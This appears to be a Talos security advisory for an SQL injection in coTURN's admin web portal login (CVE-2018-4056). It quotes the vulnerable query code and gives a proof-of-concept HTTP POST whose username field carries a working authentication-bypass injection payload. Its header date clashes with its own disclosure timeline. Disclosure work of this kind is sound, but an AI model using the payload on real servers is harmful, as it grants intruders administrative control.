Talos Vulnerability Report

TALOS-2018-0730

coTURN Administrator Web Portal SQL injection vulnerability

January 29, 2018
CVE Number

CVE-2018-4056

Summary

An exploitable SQL injection vulnerability exists in the administrator web portal function of coTURN prior to version 4.5.0.9. A login message with a specially crafted username can cause an SQL injection, resulting in authentication bypass, which could give access to the TURN server administrator web portal. An attacker can log in via the external interface of the TURN server to trigger this vulnerability.

Tested Versions

coTURN 4.5.0.5

Product URLs

https://github.com/coturn/coturn

CVSSv3 Score

9.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Details

coTURN is an open-source implementation of TURN and STUN servers that can be used as a general-purpose networking traffic TURN server. TURN servers are usually deployed in so-called “DMZ” zones — any server reachable by the internet — to provide firewall traversal solutions. Attackers who are able to take over such servers may be able to bypass firewalls and conduct additional attacks.

According to Shodawn, thousands of coTURN servers are directly reachable on the internet.

The username in POST requests to the login page is passed to the following function in src/apps/relay/dbdrivers/dbd_mysql.c src/apps/relay/dbdrivers/dbd_pgsql.c src/apps/relay/dbdrivers/dbd_sqlite.c

snprintf(statement, sizeof(statement), "select realm,password from admin_user where name='%s'", usname);

The usname element can be crafted to return an arbitrary password.

Even when no administrators are configured and the administrator web portal is deactivated, the portal still accepts POST requests, so it’s still possible to exploit this vulnerability and reactivate the portal.

Exploit proof of concept

POST /logon HTTP/1.1
Host: 192.168.0.2:443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

uname=user' union select '','0000'; --&pwd=0000

Timeline

2017-09-04 - Vendor Disclosure
2019-01-29 - Public Disclosure

Credit

Discovered by Nicolas Edet of Cisco.